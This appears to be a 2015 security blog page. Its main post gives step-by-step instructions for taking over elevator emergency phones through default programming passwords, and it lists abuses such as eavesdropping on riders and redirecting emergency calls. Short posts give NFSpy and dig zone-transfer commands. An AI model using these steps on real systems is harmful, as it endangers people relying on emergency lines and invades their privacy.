Sep 13, 2015

Hijacking an Elevator Phone

If you have ever been on an elevator, you have probably seen (or even used) the elevator phone inside the elevator. By law elevators are required to have some form of two-way communication which usually entails a device connected POTS (Plain Old Telephone Service) or PBX telephone line. Turns out, these devices are easy to take over and use for malicious purposes.

Many elevator phones are programmable in order to allow for different use-cases at different locations. A lot of these can be programmed simply by calling the phone number attached to the elevator phone.

How do we find the telephone number to the elevator phone?

Each phone may have a standard phone line attached to it (RJ-11). Find it and you can "borrow" that connection to find the number to the elevator phone.

You can use a small corded telephone like the one above to connect to the phone line. Once connected, dial 1-800-444-4444. This number is a toll-free Automatic Number Announcment Circuit that will inform you of the phone number you are calling from. Note this phone number down. Also note down the manufacturer or model number of the elevator phone if you can find it.

Look up the documentation for the specific model number of the elevator phone and you will find that you will most likely be able to program it simply by calling the number it is attached to. You will also find that it may have a default password to access programming mode, such as 123456 or 35842#. From there, you can perform actions such as change the message it announces or even change the number it calls when the emergency button is activated. Documentation example here.

How can this be used maliciously?

  1. Most elevator phones will auto answer when called. You can find the phone number to the device, call it, and now you are listening to private conversations happening in the elevator. This has the potential for corporate espionage.
  2. You can cause a Denial-of-Service by changing who the elevator phone calls in case of an emergency.
  3. You can pull a prank by changing the message it announces to people in the elevator car, or the party the phone is calling.
  4. Think of some other things you can do with this. Maybe some social engineering attacks.

PS: Sometimes, you can find the elevator phone's phone number written somewhere in the elevator by maintenance personnel

Sep 09, 2015

DEFCON23 Presentation

So my DEFCON23 talk was given an early-release onto the internet! I am excited since many of you were eager to see it and I'd hate for you all to have to wait for the normal release schedule.

DEF CON 23 - Dennis Maldonado - Are We Really Safe? - Bypassing Access Control Systems

Sep 07, 2015

NFSpy - Attacking NFS Servers

I recently learned of the tool: NFSpy which can be used for attacking an NFS server.

nfspysh -o server=<ip/host>:<dir>

nfspysh -o server=

Sep 05, 2015

Initiate zone transfer using Dig

Dig is a DNS lookup utility. You can use Dig to initiate a DNS zone transfer from a DNS server that allows it. This is useful to for finding sensitive information such as hostnames.

dig @<dnsserver> <domain> axfr

For example:

dig axfr